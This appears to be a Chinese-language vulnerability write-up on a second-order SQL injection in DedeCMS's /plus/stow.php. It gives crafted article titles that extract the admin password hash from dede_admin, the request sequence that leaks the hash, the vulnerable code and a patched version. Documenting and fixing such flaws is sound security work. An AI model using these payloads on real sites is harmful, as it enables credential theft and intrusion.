dedecms /plus/stow.php Twice SQL Injection

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

收藏文章功能$title变量未过滤，造成二次注入

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375

2. 漏洞触发条件

0x1: 发布一个特殊构造标题的文章

http://127.0.0.1/dedecms5.5/member/content_list.php?channelid=1
//文章标题如下，目的是额外注入了一条可以查询出管理员密码的SQL语句
u',char(@`'`), (select pwd from dede_admin))#

0x2: 提交收藏请求

获取刚才发布文章的aid。例如aid=108，针对这篇文章发起收藏请求
http://localhost/dedecms5.5/plus/stow.php?aid=108&type=001 

0x3: 发起刚才发布的文章的"推荐"请求

http://localhost/dedecms5.5/member/mystow.php
//点击刚才发布的文章的"推荐"链接，打开如下连接
http://localhost/dedecms5.5/plus/recommend.php?type=29a53fb3c3&aid=108
//其中type=29a53fb3c3的"29a53fb3c3"为向dede_admin.pwd字段的前10位，这个时候二次注入就已经发生了

0x4: 注入后10位

后10位使用类似的步骤，不同的是发布的文章标题为
u',char(@`'`),substring((select pwd from dede_admin),11))#

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375

3. 漏洞影响范围
4. 漏洞代码分析

/plus/stow.php

..
$row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' ");

if(!is_array($row))
{
    //这里的TITLE是从数据库里查询出来的，也就是我们发布的文章的标题
    $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".$title."','$addtime'); ");
}
..

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2014-048913

5. 防御方法

/plus/stow.php

<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");

$aid = ( isset($aid) && is_numeric($aid) ) ? $aid : 0;
$type=empty($type)? "" : HtmlReplace($type,1);
if($aid==0)
{
    ShowMsg('文档id不能为空!','javascript:window.close();');
    exit();
}

require_once(DEDEINC."/memberlogin.class.php");
$ml = new MemberLogin();

if($ml->M_ID==0)
{
    ShowMsg('只有会员才允许收藏操作！','javascript:window.close();');
    exit();
}


//读取文档信息
$arcRow = GetOneArchive($aid);
if($arcRow['aid']=='')
{
    ShowMsg("无法收藏未知文档!","javascript:window.close();");
    exit();
}
extract($arcRow, EXTR_SKIP);
/**/
$title = HtmlReplace($title,1);
$aid = intval($aid);
/**/
$addtime = time();
if($type==''){
    $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' AND type='' ");
    if(!is_array($row))
    {
        $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes($arctitle)."','$addtime'); ");
  }
}else{
    $row = $dsql->GetOne("Select * From `#@__member_stow` where type='$type' and (aid='$aid' And mid='{$ml->M_ID}')");
  if(!is_array($row)){
      $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime,type) VALUES ('".$ml->M_ID."','$aid','$title','$addtime','$type'); ");
  }
}

//更新用户统计
$row = $dsql->GetOne("SELECT COUNT(*) AS nums FROM `#@__member_stow` WHERE `mid`='{$ml->M_ID}' ");
$dsql->ExecuteNoneQuery("UPDATE #@__member_tj SET `stow`='$row[nums]' WHERE `mid`='".$ml->M_ID."'");

ShowMsg('成功收藏一篇文档！','javascript:window.close();');
?>

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved